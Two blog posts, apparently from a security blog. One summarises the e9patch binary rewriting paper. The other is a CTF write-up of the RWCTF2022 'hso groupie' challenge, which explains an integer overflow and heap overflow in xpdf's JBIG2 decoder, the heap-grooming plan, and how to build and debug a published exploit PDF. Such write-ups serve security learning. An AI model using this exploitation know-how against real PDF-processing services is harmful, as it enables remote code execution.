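Binary rewriting is useful in many scenarios, such as repair, hardening, instrumentation, patching, and debugging. Most binary rewriting techniques depend on recovering control flow information from the input binary, because they typically move instructions around, which means the relative offsets of other jump instructions have to be adjusted. In other words, the set of jump targets must be fixed up.

The problem is that recovering control flow information from a binary is quite hard:

One approach relies on specific binary metadata, such as debug symbols, to recover relocation information, but not every binary carries such metadata (it may be stripped).
Another approach uses static binary analysis, but this usually works poorly and does not scale to large binaries.

As a result, most binary rewriting techniques rest on one or more sets of assumptions, such as a specific compiler or a specific programming language. This limits them, makes them hard to extend, and prevents them from handling large programs such as chrome.

This paper presents a binary rewriting technique for x86_64 called e9patch, where e9 refers to 0xe9, the opcode of jmpq rel32. Its advantage is that it is control flow agnostic: it needs no knowledge of control flow at all. The rewriting method preserves the set of jump targets, so no control flow recovery is required. The tool is therefore quite robust and can patch binaries larger than 100MB, such as chrome.

Besides ordinary executables, e9patch can also patch shared objects and libraries.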

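II. Background

A control flow agnostic rewriter does not need to know the set of jump targets. It treats every instruction as a potential jump target and preserves that instruction's semantics whenever control flow reaches it (note: the semantics, not the original instruction). That is, every instruction in the binary satisfies one of the following three conditions:

The original instruction is kept.
It is replaced with an operationally equivalent instruction.
It is replaced with instructions that serve a specific purpose, such as repair or instrumentation.

Below are several control flow agnostic rewriting techniques that e9patch builds on.

B0: int3 breakpoints

This is probably the simplest technique. A given instruction is patched into an int3 breakpoint. When control flow reaches it, a SIGTRAP is raised and the signal handler takes over (in some uses a debugger takes over instead, as in trapfuzz), so the actual patch work can be done inside the signal handler.

The drawback is high performance overhead. Interrupts and signal handler dispatch involve user-kernel context switches, which can cost an order of magnitude more time.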

B1: Jumps

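This approach replaces the target instruction with a jmpq rel32 instruction, so that control flow jumps to a trampoline when it reaches that point. The trampoline executes the patch code and, when needed, the original instruction that was patched out. One application of this approach is the inline hook:

This approach has its limits as well. A jmpq rel32 instruction is 5 bytes long. If the instruction to be patched is 5 bytes or longer, the jmpq can simply be written over it, and the rewriting is still control flow agnostic.

But what if the instruction to be patched is shorter than 5 bytes? Taking the figure above as an example, replacing mov edi, edi with a jmpq also overwrites the next two instructions. If some jmp in the function targets either of those two overwritten instructions, it will fault, because the bytes at the jump target have been tampered with.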
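The size problem can be checked mechanically. The sketch below takes a list of instruction lengths and reports which following instructions a 5-byte jmpq rel32 would clobber. The lengths in the example assume the usual 32-bit hot-patch prologue `mov edi, edi; push ebp; mov ebp, esp` (2 + 1 + 2 bytes); that sequence is my assumption about the missing figure, and the helper name is hypothetical.

```python
JMP_REL32_SIZE = 5  # 1 opcode byte (0xe9) + 4 bytes of rel32


def clobbered_by_jump(instr_sizes, index):
    """Indices of later instructions overwritten when a 5-byte jmpq rel32
    is written at the start of instruction `index`."""
    overflow = JMP_REL32_SIZE - instr_sizes[index]
    victims = []
    i = index + 1
    while overflow > 0 and i < len(instr_sizes):
        victims.append(i)
        overflow -= instr_sizes[i]
        i += 1
    return victims


# mov edi, edi (2 bytes); push ebp (1 byte); mov ebp, esp (2 bytes)
print(clobbered_by_jump([2, 1, 2], 0))
```

If the returned list is empty, the plain B1 replacement stays control flow agnostic; otherwise every listed instruction is a jump target that would break.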

B2: Instruction Punning

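This technique deserves a closer look, because e9patch is an extension of it.

Besides the two methods above, there is another one that deals specifically with jmpq instructions that can safely overlap other instructions. It is called instruction punning. The basic idea is to find a relative offset whose byte representation is shared with the overlapped instructions, and then use that offset to safely replace the patched instruction with a jmpq.

A simple example:

mov %rax, (%rbx)
add $32, %rax

The corresponding machine code is shown as "original" in the figure below:

Suppose we need to patch mov %rax, (%rbx). Instruction punning can reuse the first two bytes of the next instruction (0x48 0x83), so that a 5-byte jmpq (jmpq 0x8348xxxx) is formed at the patch point without modifying the bytes of the next instruction.

When control flow reaches the location of the mov, it takes the jmpq. If some other instruction needs to jump to the add, the add still works correctly, because its bytes have not been modified.

The "pun" in instruction punning refers to the fact that the bytes of the next instruction represent both that instruction and part of the jmpq offset.

This approach has limits too. The two high-address bytes of the jmp's relative offset are pinned by the bytes of the next instruction, so the reachable memory is restricted to relative offsets in the range 0x83480000~0x8348ffff. That range is not always available. It may correspond to:

The memory region of another trampoline
Other code or data segments
An invalid address range, such as NULL or an underflow into negative addresses

In this figure, the relative offset 0x8348xxxx is actually a negative number (as a 32-bit offset). With a negative offset, the actual jump target may land around NULL or even underflow into the negative address range, and that memory can be very hard to mmap.

So instruction punning can only patch some instructions, and its patch coverage is not high.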

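III. Design

e9patch builds on the B1/B2 methods above and adds a series of improvements. Before going into them, here are the assumptions the tool relies on:

Patched instructions are never read by the program itself (for example, for self-checksumming) or written by it.
Instrumentation and patching are transparent to the user, meaning program behavior does not change through some side channel (for example, timers or file descriptors).
The input binary itself does not use overlapping instructions or instruction punning.

These assumptions are much weaker than the ones mentioned earlier (a specific compiler, a specific language, binary metadata, and so on); e9patch depends on none of those.

e9patch does not embed a disassembler. Instead, the user supplies the instruction information of the target program (such as instruction offsets and sizes). This gives more flexibility: the user can instrument part of a program while knowing only part of its instructions, which improves efficiency, and it also makes e9patch easier to embed into other designs.

Now for the three new tactics e9patch provides. We will use the following instructions as a running example:

Ins1: mov %rax, (%rbx)
Ins2: add $32, %rax
Ins3: xor %rax, %rcx
Ins4: cmpl $77, -4(%rbx)

To simplify the explanation, assume the following:

The instruction to patch is Ins1.
Memory reached by a negative relative jump offset is invalid, that is, it cannot be allocated.
Consequently, the Instruction Punning technique described earlier cannot be used, because its relative jump offset is negative.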

T1: Padded Jumps

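A jmpq is normally encoded in 5 bytes: a 1-byte opcode and a 4-byte relative offset. There is, however, a way to encode a jmpq with more bytes: pad the jump with extra bytes in the form of redundant instruction prefixes.

x86_64 has some instruction prefixes that do not affect the semantics of a relative jump, such as REX prefixes, segment override prefixes (es, ss, and so on), and the operand-size override prefix (0x66). In this example, we can pad the jmpq with prefixes so that the bytes of its relative offset shift toward higher addresses.

In the figure, T1(a) pads with one REX prefix (0x48), after which the jmpq offset has the form 0xc08348XX. That offset is negative, so it cannot be used and more padding is needed.

On top of T1(a), e9patch then adds the segment override prefix es (0x26), which gives T1(b). Now the relative offset of the jmpq in T1(b) is 0x20c08348, which is no longer negative, so this jmpq very likely targets memory that can be allocated.

This example shows the advantage, the drawback, and one characteristic of tactic T1:

Advantage: by writing a few extra instruction prefixes, new valid relative jump offsets can be found and used.
Drawback: the applicability of T1 depends on instruction length. The shorter the instruction, the fewer patch attempts T1 can make. This also means T1 cannot patch single-byte instructions.
Characteristic: every new patch attempt shrinks the address range available to the trampoline. For example:
- B2 relative jump range: 0x83480000~0x8348ffff (0x10000 possible offsets)
- T1(a): 0xc0834800~0xc08348ff (0x100 possible offsets)
- T1(b): 0x20c08348 (exactly one offset)
I file this under characteristic rather than drawback because e9patch only adds another prefix when the memory reachable with the current prefixes is unusable. An unusable range is of no help however large it is.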
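The three ranges listed above follow directly from the encodings `48 89 03` (mov %rax, (%rbx)) and `48 83 c0 20` (add $32, %rax). The Python sketch below recomputes them as signed 32-bit offsets for 0, 1, and 2 padding prefixes; the helper name `rel32_range` is mine, and the sketch ignores which concrete prefix bytes are used.

```python
import struct

INS1 = bytes.fromhex("488903")    # mov %rax, (%rbx)
INS2 = bytes.fromhex("4883c020")  # add $32, %rax


def rel32_range(ins1_len, following, pad):
    """Signed (lowest, highest) rel32 when `pad` prefix bytes precede 0xe9
    and the jump starts at the first byte of the patched instruction."""
    free = ins1_len - pad - 1  # rel32 bytes that still lie inside Ins1
    if free < 0:
        raise ValueError("too many prefix bytes for this instruction")
    free = min(free, 4)
    fixed = following[:4 - free]  # rel32 bytes punned with the next instruction
    # rel32 is little-endian: the free low bytes come first, the fixed bytes last.
    lo = struct.unpack("<i", b"\x00" * free + fixed)[0]
    hi = struct.unpack("<i", b"\xff" * free + fixed)[0]
    return lo, hi


for pad, name in enumerate(["B2", "T1(a)", "T1(b)"]):
    lo, hi = rel32_range(len(INS1), INS2, pad)
    print(name, hex(lo & 0xFFFFFFFF), hex(hi & 0xFFFFFFFF), "negative" if hi < 0 else "positive")
```

Only the last case produces a positive offset, which is why the example needs two prefix bytes before the jump becomes usable under the stated assumptions.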

T2: Successor Eviction

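What if, under T1, no amount of padding on Ins1 yields a usable jump offset? Could we change the first few bytes of Ins2 to make patching Ins1 possible? This leads to another tactic, called successor eviction. The idea is:

Evict the adjacent instruction Ins2 and replace it with a jmpq.
That jmpq jumps to trampoline2, which executes the original Ins2 and then jumps back to continue with Ins3 and the instructions after it.

Note: the evicted instruction is called the victim.

This way the semantics of Ins2 are unchanged (Ins2 is still executed; the only difference is that it now runs in trampoline2, with two extra jumps: one to trampoline2 and one back). But the bytes at the address of Ins2 really have changed. Ins1 can therefore retry tactic T1, and once that succeeds it can jump to trampoline1 to do its other work.

Note that the two trampolines are different.

The whole idea boils down to:

Try tactic T1 and find that it cannot patch Ins1. To change the bytes of Ins2 that Ins1 depends on, e9patch first tries T1 on Ins2. Once Ins2 is patched, it retries T1 on Ins1.

The whole process still guarantees that:

The semantics of Ins2 are the same as before.
The program's set of jump targets is unchanged.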

T3: Neighbour Eviction

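What if the adjacent instruction cannot be patched and Successor Eviction does not work either?

e9patch keeps searching further ahead (toward higher addresses) for a byte sequence that can serve as the relative offset rel32.
Once one is found, a jmpq instruction is created in place there; this is T3(a).
Then a short relative jump is patched over the instruction to be patched, targeting this new jmpq; this is T3(b).
Note that the machine code of Ins3 has been modified by the second step. So Ins3 also needs to be patched with a jmpq that jumps to a trampoline where Ins3 is executed.
This keeps the semantics of Ins3 the same before and after the modification (T3(c)).

Tactic T3 is more complex, but also more powerful. The key is the number of candidate victims. Assuming an average instruction length of 4, a short jump can reach about 64 potential victims, so in most cases at least one suitable victim exists. This tactic pushes the coverage of patchable instructions to nearly 100%.

Below is an example of tactic T3: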

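S1: Reverse Order Patching

Everything above deals with patching a single instruction. In practice, users often ask to patch several consecutive instructions.

Patching several consecutive instructions here does not mean turning the whole run into one trampoline jmp. It means turning each instruction in the run into its own trampoline jmp.

Let's look at this figure again:

Suppose the user wants to patch Ins1 into a jmp to trampoline1 and Ins2 into a jmp to trampoline2. If we patch Ins1 first (T1(b)), the resulting trampoline1 jmp depends on the machine code of Ins2 (because the rel32 of the Ins1 jmpq now overlaps the bytes of Ins2).

This dependency gets in the way of patching Ins2: if Ins1 is patched first and Ins2 second, patching Ins2 may break the already patched Ins1.

To manage multiple patch locations better, e9patch uses a reverse order patching strategy. The basic idea is to patch instructions from high addresses to low addresses, because punning can only introduce dependencies on subsequent instructions.

e9patch keeps a state for every byte of machine code, locked or unlocked, which can be stored in a bitmap. A byte is considered locked when it has been:

modified by e9patch, or
used as part of an instruction pun.

This places the following constraints on T1-T3:

A patch may not modify locked bytes (it may still reuse or overlap them).
Only bytes after the current patch location are ever locked (to keep dependencies manageable).
As a result, the rel8 of the T3 short jump can only be positive, which halves the jump range (that is, the number of instructions that can be evicted).
In practice, this restriction has very little effect in the experiments.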

M1: Memory and File Size Management

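Finally, consider where trampolines are placed in memory. As the previous tactics show, the address of a trampoline is constrained by the relative offset produced by punning. For example:

The trampoline addr for T1(b) is 0x20c08348
The trampoline addr for T3(b) is 0x4dfc7b83

These are very far apart in memory, which hurts trampoline packing and leads to high fragmentation and low memory utilization. Scattered trampolines also greatly increase the space they take up in the ELF file.

One obvious way to mitigate this inefficiency is to put as many trampolines as possible into the same virtual page. In the worst case, though, each trampoline ends up in its own page.

So e9patch also uses a mechanism called Physical Page Grouping:

Try to gather trampolines that live in different virtual pages and store them in the same physical page.

Taking the figure above as an example, initially one Physical Page P(a) corresponds to one Virtual Page V(a), which consumes a lot of physical memory. After Physical Page Grouping, one Physical Page P(b) corresponds to several Virtual Pages V(b), which saves a lot of physical memory.

Note: a trampoline that crosses a page boundary is treated as two mini trampolines.

The grouping algorithm from V(a) to P(b) is a partitioning algorithm. There are many ways to implement one; e9patch picks the simplest, a greedy algorithm, and it performs reasonably well.

Physical Page Grouping has side effects of its own:

Trampolines that are not used at a given virtual page get loaded into redundant memory locations. Since these redundant trampolines are never executed, they do not affect program behavior.
The same physical memory is mapped into the virtual address space many times, and the number of mappings may exceed the default limit vm.max_map_count = 65536. There are two remedies:
1. Raise the default maximum number of mappings with sudo, which is not very practical.
2. Tune e9patch's partition granularity parameter M (the maximum number of physical pages used for grouping trampolines) to increase the number of physical pages P(b) in use, which lowers the number of mappings per physical page. Usually, with M >= 64, the number of mappings for a single binary always stays below the default limit.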
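A greedy grouping in this spirit can be sketched as follows. This is a first-fit illustration under my own simplifications, not the partitioning algorithm e9patch actually ships: each virtual page is described by the byte intervals its trampolines occupy inside the page, and two virtual pages may share a physical page only if those intervals do not overlap. The page addresses and intervals in the example are made up.

```python
def overlaps(a, b):
    """True if any half-open interval (start, end) in a overlaps one in b."""
    return any(s1 < e2 and s2 < e1 for s1, e1 in a for s2, e2 in b)


def group_pages(virtual_pages):
    """virtual_pages maps a virtual page address to the list of in-page
    (start, end) byte intervals occupied by trampolines.
    Returns one list of virtual page addresses per physical page."""
    groups = []  # each entry: (occupied intervals, member virtual pages)
    for vaddr, intervals in sorted(virtual_pages.items()):
        for occupied, members in groups:
            if not overlaps(occupied, intervals):
                # First fit: merge this virtual page into the physical page.
                occupied.extend(intervals)
                members.append(vaddr)
                break
        else:
            groups.append((list(intervals), [vaddr]))
    return [members for _, members in groups]


pages = {
    0x20c08000: [(0x348, 0x360)],
    0x4dfc7000: [(0xb83, 0xba0)],
    0x70000000: [(0x340, 0x350)],  # collides with the first page's interval
}
grouping = group_pages(pages)
print([[hex(v) for v in g] for g in grouping])
```

Each inner list becomes one physical page mapped at several virtual addresses, which is also where the extra mmap entries counted against vm.max_map_count come from.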

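IV. Implementation

Inputs to e9patch:

The unpatched binary
Instruction information for the binary, including locations and sizes
The set of locations of the instructions to patch
The set of trampolines

Output: a patched program produced with the tactics above. The rewritten binary is a drop-in replacement for the original file and needs no extra dependencies.

Two points in the implementation are worth noting:

New trampolines are appended to the end of the ELF file so that existing data and code do not move, which avoids complicated changes to the ELF headers.
The new physical pages holding trampolines must be mapped into the program's virtual address space at load time. In the actual implementation, e9patch integrates a mini loader into the output binary and replaces the entry point with the mini loader's entry point. Once the virtual pages for the trampolines are mapped, control returns to the real entry point.

e9patch supports both PIE and non-PIE binaries. PIE programs are easier to patch than non-PIE ones, because PIE code is usually loaded at high addresses, whereas non-PIE code is loaded at low addresses, which are closer to NULL.

Some situations limit the use of e9patch:

L1: Virtual memory shortage. Programs with very large code or data segments may restrict the space available to trampolines: the jmpq offset is 32 bits, so if the code and data segments are too large, a jump may not be able to reach the heap space.
L2: Patching single-byte instructions. e9patch cannot patch single-byte instructions, which affects instructions such as push, pop, and ret.
L3: Patching a very large number of instructions. Trying to patch a great many instructions may lower patch coverage because of dependencies between machine code bytes.

In addition, e9patch cannot handle inline data, that is, data embedded in code.

In general, though, L1 does not apply to most programs, and L2 and L3 are also irrelevant for many programs.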

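V. Evaluation

The evaluation looks mainly at the following metrics:

Patch time
Patch coverage
Size of the patched binary
Scalability of the e9patch prototype

e9patch can be applied to binary hardening, instrumentation, repair, and more. In the experiments, e9patch patches two kinds of instructions:

All jmp/jcc jump instructions
This roughly simulates coverage instrumentation. By design e9patch has no basic block information, so it simply patches every jmp instruction.
All instructions that may write through a heap pointer
This simulates binary hardening, where instructions that write through heap pointers are patched.

Every patched instruction is redirected to an empty trampoline that does nothing except execute the original instruction. The results are as follows:

#Loc: total number of patch locations
Base%: coverage of the B1+B2 tactics
Succ%: overall patch coverage

The figure above shows that:

e9patch reaches very high coverage, close to 100%.
Where baseline coverage is low, tactics T1-T3 raise it dramatically.
Tactic T3 deserves special mention. Its own patch coverage is already fairly large, and it can patch instructions that no other tactic can.
For every patch tactic, coverage on PIE programs is much higher than the corresponding coverage on non-PIE programs.
gamess and zeusmp do not reach 100% coverage because both programs allocate a very large .bss segment (which is exactly case L1). When they are compiled as PIE, they reach 100% coverage.
With physical page grouping, file size grows by +57% / +30%, which is acceptable.
Without it, the growth is +2239.83% / +568.96%, which is really not acceptable.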

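Next is the scalability test. These are the results for the large programs chrome and firefox:

firefox places most of its code in libxul.so.

The benchmarks were chosen to minimize the time spent executing JIT-compiled JS code, because e9patch cannot patch JIT code.

As shown, chrome incurs about +113% overhead and firefox about +46%. One possible reason for firefox's lower overhead is that it spends more time running JIT code or uninstrumented shared objects.

The above shows that e9patch scales easily to binaries hundreds of megabytes in size.

Last is how e9patch performs for binary hardening. First, a short introduction to the hardening technique used in the test: LowFat Pointers. The basic idea is to split the program's virtual address space into several large regions, each responsible for allocating objects of a given fixed size range:

The first region contains the program text, data, bss, and other segments as usual.
The following regions are used for LowFat pointer allocation. For example,
- Region #1 is used for allocations of 1-16 bytes
- Region #2 is used for allocations of 17-32 bytes
- and so on
In addition, every LowFat-allocated object is aligned to its allocation size. As a result, the value of any LowFat pointer is enough to recover the bounds of the object it points to.

A simple example:

p = malloc(10); // p = 0x8997f2820

Since the value of p lies in 0x800000000~0x1000000000, we know the object p points to is 16 bytes in size (note the alignment).

For a memory access q = 0x8997f2825:

q lies in the range 0x800000000~0x1000000000, so the object size is 16 bytes.
Aligning q down to the object size gives the address 0x8997f2820, which is the base address of the object.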
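The pointer arithmetic in this example is easy to reproduce. The sketch below assumes each region spans 0x800000000 bytes (inferred from the range in the example) and that region #n serves allocations of 16 * n bytes, which matches the two regions listed above; real LowFat implementations use a table of size classes, so treat the formula and the function names as illustrative only.

```python
REGION_SIZE = 0x800000000  # assumed span of one region, taken from the example


def lowfat_size(ptr):
    """Allocation size implied by the region the pointer falls into."""
    region = ptr // REGION_SIZE
    if region == 0:
        return None  # region #0 holds text/data/bss, not LowFat objects
    return 16 * region  # assumption: region #1 -> 16 bytes, #2 -> 32 bytes, ...


def lowfat_base(ptr):
    """Object base: the pointer rounded down to a multiple of the object size."""
    size = lowfat_size(ptr)
    return None if size is None else ptr - ptr % size


def in_bounds(q, r):
    """True if address r lies inside the object that q points into."""
    base, size = lowfat_base(q), lowfat_size(q)
    return base <= r < base + size


q = 0x8997f2825
print(hex(lowfat_base(q)), lowfat_size(q))
```

`in_bounds` is the same comparison that a bounds-checking instrumentation would perform before dereferencing a derived pointer.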

Next, instrument the following function:

char get(char *q, int i)
{
    return q[i];
}

The instrumented function, which detects OOB accesses, looks like this:

char get(char *q, int i)
{
    char *q_base = base(q);
    size_t q_size = size(q);
    char *r = q + i;
    if (r < q_base || r >= q_base + q_size)
        report_oob_error();
    return *r;
}

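The figure below shows the experimental results of e9patch applying a LowFat variant:

The lowfat project itself only works for C/C++, whereas e9patch can be applied to binaries written in any language, which makes e9patch quite powerful.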

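RWCTF2022 Pwn Notes 3 - hso groupie Writeup

2022-02-01T16:00:00.000Z

Introduction

These are notes written while revisiting the hso groupie challenge from RWCTF2022. The technique it tests comes from the Project Zero article A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution.

The overall solution is derived mainly from Riatre's exploit. In other words, these notes are mostly an explanation of the author's exploit.

Since this challenge is also fairly complex, it gets a post of its own.

Co-author: sakura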

I. Challenge Description

Help check how secure our latest PaaS (Pdftohtml-as-a-Service) is!
Pick your favorite bug from this bloody list, or really, just exploit that bug so your exploit would also work on latest Poppler [1] and maybe even KItinerary.
The container image is also available on Docker Hub.
[1] Yeah, turns out propagating bug fixes between different Clone-and-Own codebases takes time :)
socat -t90 stdio tcp-connect:47.242.147.191:31337
attachment

Clone-and-Pwn, difficulty:hard

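This is a clone-and-pwn challenge. The source code is unmodified, so the task is to find and exploit a vulnerability by looking through recently committed bug fixes.

II. Environment Setup

1. Local environment

The challenge binary was built on debian, so on some debian systems the exploit runs directly (mine, for example XD).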

wget https://dl.xpdfreader.com/xpdf-4.03.tar.gz
tar -zxvf xpdf-4.03.tar.gz
cd xpdf-4.03
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0" ..
make -j `nproc` 

# The challenge also ships a glibc attachment: `GNU C Library (Debian GLIBC 2.33-2) release`
patchelf --replace-needed libc.so.6 ${PWD}/../../libc.so.6 ./xpdf/pdftohtml

To launch it:

xpdf/pdftohtml --

2. Exploit debugging environment

Download the dockerfile and the rest of the challenge environment from the challenge page, then patch the dockerfile:

--- a/Dockerfile
+++ b/Dockerfile
@@ -8,7 +8,7 @@ RUN cd /tmp/xpdf-4.03 && \
     mkdir build && \
     cd build && \
     cmake -DCMAKE_BUILD_TYPE=Release \
-        -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro" .. && \
+        -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0 " .. && \
     make -j$(nproc)

 FROM debian:unstable-20211220-slim
@@ -20,6 +20,7 @@ RUN echo "deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/2
     apt-get install -y fonts-arkpandora fonts-noto fonts-dejavu fonts-font-awesome fonts-lato fonts-powerline gsfonts && \
     apt-get clean && rm -rf /var/lib/apt/lists/*
 COPY --from=build /tmp/xpdf-4.03/build/xpdf/pdftohtml /usr/local/bin/
+COPY gdbserver /usr/bin/gdbserver
 RUN mkdir -p /run/secrets && echo 'rwctf{flag placeholder}' > /run/secrets/flag

-ENTRYPOINT [ "/bin/sh", "-c", "/usr/local/bin/pdftohtml \"$@\"", "--" ]
\ No newline at end of file
+ENTRYPOINT [ "/bin/sh"]
\ No newline at end of file

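The purpose of the patch is to put gdbserver into the image and to make the entry point stop at /bin/sh instead of launching pdftohtml directly.

Pay attention to the source path of the COPY command; a relative path is used here.

Run build.sh, then check the image once it finishes: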

➜  chall git:(master) docker image ls         
REPOSITORY             TAG                      IMAGE ID       CREATED             SIZE
hsogroupie/pdftohtml   latest                   042e72a0f133   45 minutes ago      946MB

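Start the docker image:

docker run -itd -p 1234:1234 -v sakura_volume:/tmp/chall --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name hsogroupie hsogroupie/pdftohtml

The command is very long, so here is a breakdown:

docker run --help

-i : keep STDIN open (interactive mode)
-t : allocate a pseudo-TTY
-d : run the container in the background (detached)
-p : host port:container port, maps a container port to a host port; 1234 for both is fine here
-v : mount a data volume
--cap-add=SYS_PTRACE --security-opt seccomp=unconfined : Docker disables ptrace by default, so these options are needed
--name : give the container a name

Mounting the data volume needs a few extra words (see the referenced article):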

docker volume create sakura_volume   # create a custom volume
docker volume ls                     # list all volumes
docker volume inspect sakura_volume  # show the details of a specific volume
...
[
    {
        "CreatedAt": "2022-02-02T01:29:55+08:00",
        "Driver": "local",
        "Labels": {},
        "Mountpoint": "/var/lib/docker/volumes/sakura_volume/_data",
        "Name": "sakura_volume",
        "Options": {},
        "Scope": "local"
    }
]

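After that, changes made under /var/lib/docker/volumes/sakura_volume/_data show up in /tmp/chall inside the container, which makes transferring files convenient.

Once the container is started, run docker ps to check that everything is fine: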

➜  chall git:(master) docker ps -a                     
CONTAINER ID   IMAGE                  COMMAND     CREATED          STATUS          PORTS                                       NAMES
15f265c337c0   hsogroupie/pdftohtml   "/bin/sh"   34 minutes ago   Up 34 minutes   0.0.0.0:1234->1234/tcp, :::1234->1234/tcp   hsogroupie

Generate the exploit pdf. Remember to initialize the submodule, otherwise the jbig2enc library is missing:

git clone https://github.com/Riatre/hso-groupie.git
cd hso-groupie/exploit
git submodule update --init
cd ..
sudo cp -r exploit /var/lib/docker/volumes/sakura_volume/_data

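Then enter the exploit directory on the data volume inside the docker container. The following packages should be installed; add anything else that turns out to be missing: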

apt-get update
apt-get install make g++ python3 pybind11-dev python3-dev python2 python2-dev
make
...
...
root@15f265c337c0:/tmp/chall/exploit# make
g++ -O3 -std=c++20 -shared -fPIC jbig2arith.cc jbig2arith.h jbjbarith.cc jbjbarith.h -ojbjbarith.cpython-39-x86_64-linux-gnu.so -I/usr/include/python3.9 -I/usr/include/python3.9
python3 sploit.py
python2 pdf.py sploit > sploit.pdf

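Debugging the exploit

docker exec -it 15f265c337c0 bash

This opens a bash shell in the container. Then start gdbserver:

rm -rf output && /usr/bin/gdbserver :1234 /usr/local/bin/pdftohtml /tmp/chall/exploit/sploit.pdf output

Here output can be any directory name. It is a required argument of pdftohtml, which creates the directory and writes its result into it, and the directory must not already exist. sploit.pdf is the exploit pdf we generated.

Then start gdb on the host, run target remote :1234, and set a breakpoint somewhere to check that it works. Because the source path inside docker differs from the source path on my host, substitute-path is needed to translate between them. I recommend putting this into a gdb script so it does not have to be typed every time.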

target remote :1234
set substitute-path  /tmp/xpdf-4.03/xpdf /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf
b findSegment
c
...
...
 ► 0x555555675179    mov    r8, qword ptr [rax]
   0x55555567517c    cmp    dword ptr [r8 + 8], esi
   0x555555675180    jne    0x555555675170                <0x555555675170>
    ↓
   0x555555675170    add    rax, 8
   0x555555675174    cmp    rax, rdx
   0x555555675177    je     0x555555675190                <0x555555675190>
───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────
In file: /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc
   4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) {
   4037   JBIG2Segment *seg;
   4038   int i;
   4039 
   4040   for (i = 0; i < globalSegments->getLength(); ++i) {
 ► 4041     seg = (JBIG2Segment *)globalSegments->get(i);
   4042     if (seg->getSegNum() == segNum) {
   4043       return seg;
   4044     }
   4045   }
   4046   for (i = 0; i < segments->getLength(); ++i) {
───────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdd28 —▸ 0x555555676c72 ◂— mov    r12, rax
01:0008│     0x7fffffffdd30 ◂— 0x0
02:0010│     0x7fffffffdd38 ◂— 0x0
03:0018│     0x7fffffffdd40 —▸ 0x555561ec0f00 ◂— 0x200000001
04:0020│     0x7fffffffdd48 —▸ 0x555561f40c64 ◂— 0x203a100000000
05:0028│     0x7fffffffdd50 ◂— 0x0
... ↓        2 skipped
─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
 ► f 0   0x555555675179
   f 1   0x555555676c72
   f 2   0x555555679198 JBIG2Stream::readSegments()+1032
   f 3   0x555555679473 JBIG2Stream::reset()+211
   f 4   0x55555560139a
   f 5   0x5555556494a9
   f 6   0x55555564aba0
   f 7   0x55555563c9e5

The debugging environment is now fully set up.

III. The Vulnerability

The intended solution uses the vulnerability from the google project zero iMessage exploit article. The bug is in JBIG2Stream:

void JBIG2Stream::readTextRegionSeg(Guint segNum, GBool imm,
                    GBool lossless, Guint length,
                    Guint *refSegs, Guint nRefSegs) {
  ...
  Guint numSyms;
  ...
  // get symbol dictionaries and tables
  codeTables = new GList();
  // 1. Initially 0
  numSyms = 0;  
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        // 2. Adding an attacker-controlled value here can overflow the integer
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      ...
    }
  }
  ...
  // get the symbol bitmaps
  // 3. After the overflow, only a small heap buffer (pointer array) is allocated
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *));
  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        // 4. Writing every pointer into that buffer overflows the heap
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k);
        }
      }
    }
  }
  ...
}
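The mismatch between the allocation size and the number of writes can be illustrated with a little 32-bit arithmetic. In the Python sketch below, the dictionary sizes are made-up values chosen to trigger the wrap-around, not the ones used by the real exploit, and the function name is hypothetical.

```python
MASK32 = 0xFFFFFFFF  # Guint is a 32-bit unsigned integer


def alloc_count(dict_sizes):
    """Value of numSyms after the first loop, with 32-bit wrap-around."""
    num_syms = 0
    for size in dict_sizes:
        num_syms = (num_syms + size) & MASK32
    return num_syms


# Hypothetical referenced symbol dictionaries: one small, one huge.
sizes = [5, 0xFFFFFFFF]
allocated = alloc_count(sizes)   # pointers the syms array has room for
written = sum(sizes)             # pointers the second loop tries to write
print(allocated, written)
```

With these values the array has room for 4 pointers, yet the copy loop already writes 5 pointers for the first dictionary alone, so the overflow starts before the huge dictionary is even reached.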

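In the maliciously crafted refSegs, some seg->getSize() values are very large (on the order of 4G), so writing everything would certainly crash. A real exploit therefore does some heap feng shui first:

As the figure shows, the exploit needs to place the backing store of the segments GList at a higher address right after the freshly created overflow chunk. Then, while the first few normally sized writes are being performed, the heap overflow replaces the pointer in the backing store that refers to the huge segment with a pointer to a segment that is not a JBIG2SymbolDict (namely a JBIG2Bitmap). When the program later looks up that segment, it is skipped.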

IV. Background Needed for the Exploit

1. JBIG2Decode

The bug is in JBIG2Stream, but how does a JBIG2Stream end up inside a pdf?

A pdf file is essentially a tree structure. Here is a pdf fragment that uses a JBIG2Stream:

4 0 obj
<< /Filter /FlateDecode
/Length 3988
>>
stream
/* [MyStream1] */
endstream
endobj

5 0 obj
<< /DecodeParms  << /JBIG2Globals 4 0 R >>
/Width 1024
/ColorSpace /DeviceGray
/Height 1
/Filter /JBIG2Decode
/Subtype /Image
/Length 418248
/Type /XObject
/BitsPerComponent 1
>>
stream
/* [MyStream2] */
endstream
endobj

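In a pdf file, 4 0 obj and 5 0 obj each denote a specific pdf object.

4 0 obj identifies MyStream1 below it, and its parameter /Filter /FlateDecode says the stream is compressed with zlib.

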